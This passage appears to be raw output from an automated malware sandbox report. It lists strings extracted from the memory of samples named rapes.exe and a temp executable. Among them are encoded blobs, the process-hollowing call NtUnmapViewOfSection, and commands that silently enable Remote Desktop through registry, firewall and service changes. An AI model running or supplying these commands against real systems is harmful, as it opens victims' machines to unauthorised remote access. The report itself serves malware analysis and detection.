0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000003.917256725.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000003.917256725.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exeString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exe, 0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exeString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exe, 0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: net start termservice
                  Source: rapes.exe, 0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS 